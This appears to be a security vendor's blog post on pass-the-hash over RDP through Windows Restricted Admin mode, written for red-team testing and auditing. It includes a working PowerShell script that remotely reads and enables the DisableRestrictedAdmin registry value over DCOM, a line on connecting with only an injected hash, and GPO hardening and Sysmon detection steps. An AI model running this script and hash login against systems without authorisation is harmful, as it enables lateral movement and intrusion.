Restricted Admin mode was introduced in Windows 8.1 and Windows Server 2012 R2 (and later backported to Windows 7 and Server 2008 R2) so that an administrator's credentials are not sent to, and cached on, the remote host during an RDP session. While well-intended, it has a side effect: because the client no longer has to supply a plaintext password, an NTLM hash (or a Kerberos ticket) is enough to authenticate, which brought pass-the-hash to RDP.
Restricted Admin mode is not enabled by default. It is controlled by the DWORD value DisableRestrictedAdmin under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa: setting it to 0 enables the mode, so a target that accepts Restricted Admin logons can be prepared by writing that value (local administrator rights on the target are required). To do this remotely we could use the Remote Registry service, but it is not always running, particularly on workstations. Instead, we can use the StdRegProv WMI class, which reaches the registry over DCOM and works wherever WMI is reachable, to flip the value remotely. This approach was later expanded by @airzero24 in his WMIReg project.
RestrictedAdmin is available for download from GhostPack.
Run "Is my host protected against RestrictedAdmin?" in Operator on each host in your environment to test whether the host accepts Restricted Admin RDP logons.
This chain will stage a RestrictedAdmin binary from Operator and use it to enumerate and adjust the Restricted Admin mode.
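The same enumerate-and-adjust step, written out in PowerShell as an added example (this is not Prelude's chain and not the GhostPack RestrictedAdmin tool). It drives StdRegProv over DCOM, so it does not depend on the Remote Registry service. Assumptions: the caller is a local administrator on the target, RPC/DCOM (TCP 135 plus the dynamic range) is reachable, and the host names used in the usage line at the bottom are constructed placeholders.

```powershell
# Added example: read and (optionally) set DisableRestrictedAdmin on a remote
# host via the StdRegProv WMI class over DCOM. Not Prelude's or GhostPack's code.
# Assumes local admin on the target and reachable RPC/DCOM.

$HKLM      = [uint32]2147483650                      # 0x80000002, HKEY_LOCAL_MACHINE as StdRegProv expects it
$LsaKey    = 'SYSTEM\CurrentControlSet\Control\Lsa'
$ValueName = 'DisableRestrictedAdmin'

function New-DcomRegSession {
    # DCOM rather than the default WSMan so that WinRM is not required either.
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [pscredential]$Credential
    )
    $opt = New-CimSessionOption -Protocol Dcom
    $p = @{ ComputerName = $ComputerName; SessionOption = $opt }
    if ($Credential) { $p.Credential = $Credential }
    New-CimSession @p
}

function Get-RestrictedAdminState {
    param([Parameter(Mandatory)][Microsoft.Management.Infrastructure.CimSession]$Session)
    $r = Invoke-CimMethod -CimSession $Session -Namespace root\default -ClassName StdRegProv `
        -MethodName GetDWORDValue `
        -Arguments @{ hDefKey = $HKLM; sSubKeyName = $LsaKey; sValueName = $ValueName }
    # ReturnValue 0 = read OK; 2 (ERROR_FILE_NOT_FOUND) = the value does not exist.
    # The mode is only on when the value is present AND equal to 0.
    switch ($r.ReturnValue) {
        0 { [pscustomobject]@{ Host = $Session.ComputerName; Present = $true;  Value = $r.uValue; Enabled = ($r.uValue -eq 0) } }
        2 { [pscustomobject]@{ Host = $Session.ComputerName; Present = $false; Value = $null;     Enabled = $false } }
        default { throw "StdRegProv.GetDWORDValue failed on $($Session.ComputerName): $($r.ReturnValue)" }
    }
}

function Set-RestrictedAdminState {
    # Writes the value (0 = enable the mode, 1 = disable it) and re-reads it to confirm.
    # This is a registry write on the target: Sysmon RegistryEvent (value set, Event ID 13)
    # on this path is a cheap detection for the technique.
    param(
        [Parameter(Mandatory)][Microsoft.Management.Infrastructure.CimSession]$Session,
        [Parameter(Mandatory)][bool]$Enable
    )
    $v = if ($Enable) { 0 } else { 1 }
    $r = Invoke-CimMethod -CimSession $Session -Namespace root\default -ClassName StdRegProv `
        -MethodName SetDWORDValue `
        -Arguments @{ hDefKey = $HKLM; sSubKeyName = $LsaKey; sValueName = $ValueName; uValue = [uint32]$v }
    if ($r.ReturnValue -ne 0) {
        throw "StdRegProv.SetDWORDValue failed on $($Session.ComputerName): $($r.ReturnValue)"
    }
    Get-RestrictedAdminState -Session $Session
}

# Usage (constructed host names): audit a list of hosts, then enable the mode on one of them.
$hosts = 'ws01.corp.example', 'ws02.corp.example'
foreach ($h in $hosts) {
    $s = New-DcomRegSession -ComputerName $h
    try   { Get-RestrictedAdminState -Session $s }
    finally { Remove-CimSession $s }
}
# $s = New-DcomRegSession -ComputerName 'ws01.corp.example'
# Set-RestrictedAdminState -Session $s -Enable $true
# Remove-CimSession $s
```

Once Enabled reads $true for a host, an RDP client that holds only the hash can connect with mstsc.exe /restrictedAdmin /v:&lt;host&gt; after injecting the hash into its logon session; the plaintext password is never needed. Remember to set the value back to 1 (or remove it) after a test.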
Microsoft has provided a list of steps to enable and require Restricted Admin mode on all outbound RDP requests. More information can be found here.
Steps to require all outbound Remote Desktop requests to use Restricted Admin mode:
Open the Credentials Delegation policy setting under Computer Configuration\Policies\Administrative Templates\System\Credentials Delegation and configure it to require Restricted Admin.
This setting takes effect when Group Policy refreshes. To refresh Group Policy immediately, open an elevated command prompt and run:
gpupdate.exe /target:computer /force
Microsoft also recommends opening the following policy setting in your GPO, enabling it, and selecting the checkbox labeled Process even if the Group Policy objects have not changed. This forces the Group Policy settings to be reapplied to target computers even when the settings within the GPO have not changed, so a locally modified value is reverted at the next refresh.
Thanks for reading our latest TTP Tuesday release! Please subscribe and reach out with any feedback. We love to hear from our community!
There are several ways to follow us and learn more about Prelude and our team members:
Download Prelude Operator: https://www.prelude.org/download/current
See the latest kill chain and TTP Releases: https://chains.prelude.org
See our open-source repositories: https://github.com/preludeorg
Listen to our Podcast: https://anchor.fm/preludeorg
Read our blog: https://feed.prelude.org
Watch our live streams: https://www.twitch.tv/preludeorg
Watch our pre-recorded content: https://www.youtube.com/c/preludeorg